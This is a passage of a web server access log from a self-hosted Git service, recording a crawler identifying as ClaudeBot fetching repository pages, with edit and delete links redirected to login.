"/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" [Client 216.73.216.188] [Length 10566] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs" [Client 216.73.216.188] [Length 11268] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/types.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/types.ts" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/index.html" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker?display=rendered" [Client 216.73.216.188] [Length 16271] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services" [Client 216.73.216.188] [Length 9887] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 13086] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12202] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/requirements.txt" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.nuget.cache" [Client 216.73.216.188] [Length 3399] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/package.json" [Client 216.73.216.188] [Length 810] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15539] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=source" [Client 216.73.216.188] [Length 12682] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 13952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json" [Client 216.73.216.188] [Length 53066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/vite.config.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Contact.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/vite.config.ts" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15796] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Footer.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Contact.tsx" -[15/Feb/2026:10:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/About.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Footer.tsx" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json" [Client 216.73.216.188] [Length 11947] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/About.tsx" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 216.73.216.188] [Length 11261] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Hero.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" [Client 216.73.216.188] [Length 4798] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/status.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Hero.tsx" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10113] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/status.json" -[15/Feb/2026:10:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" [Client 216.73.216.188] [Length 10046] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/project.assets.json?display=source" [Client 216.73.216.188] [Length 37338] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 1432] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 9839] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 30635] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fappsettings.Development.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15382] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/vite.config.ts" -[15/Feb/2026:10:52:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fapp%2Ffetcher.py" [Client 216.73.216.188] [Length 36750] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/lib64" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 216.73.216.188] [Length 11479] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 451] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 10113] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" [Client 216.73.216.188] [Length 14231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15817] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0" [Client 216.73.216.188] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json?display=source" [Client 216.73.216.188] [Length 11061] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services" [Client 216.73.216.188] [Length 9921] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 216.73.216.188] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties" [Client 216.73.216.188] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11521] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12633] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/calculator.py" [Client 216.73.216.188] [Length 1922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 6903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 216.73.216.188] [Length 11267] 